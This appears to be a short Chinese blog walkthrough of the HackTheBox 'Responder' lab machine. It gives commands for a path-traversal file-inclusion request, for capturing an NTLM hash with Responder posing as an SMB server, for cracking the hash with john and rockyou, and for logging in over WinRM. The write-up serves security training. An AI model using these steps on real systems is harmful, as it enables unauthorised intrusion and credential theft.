HTB靶场:Responder(远程包含协议&NTLM哈希破解&WinRM)
1. 拿到target IP,进行扫描
发现http服务和WinRM协议(远程管理)
2. 对http服务进行访问,发现无法访问
curl -v http://{ip}
发现类似如下内容:
原因:被重定向,且无法解析域名地址
解决:hosts上添加DNS解析
3. 发现包含漏洞点,存在本地文件包含
GET /index.php?page=../../../../../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
Host: unika.htb
继续测试远程包含,FTP协议、SMB协议等
4. 尝试利用responder伪造成SMB服务器
responder -I tun0
5. 访问伪造的SMB服务
收到来自靶机的流量
6. 将hash值放到john上解出明文
john -w=/usr/share/wordlists/rockyou.txt hash.txt
顺手解压rouckyou.txt.gz
gzip -d rockyou.txt.gz
得到账号密码
7. 利用远程管理协议——WinRM的登录工具evil-winrm
8. 拿到flag
本文作者:ki-playground
本文链接:https://www.cnblogs.com/hackthebox/p/18410460
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步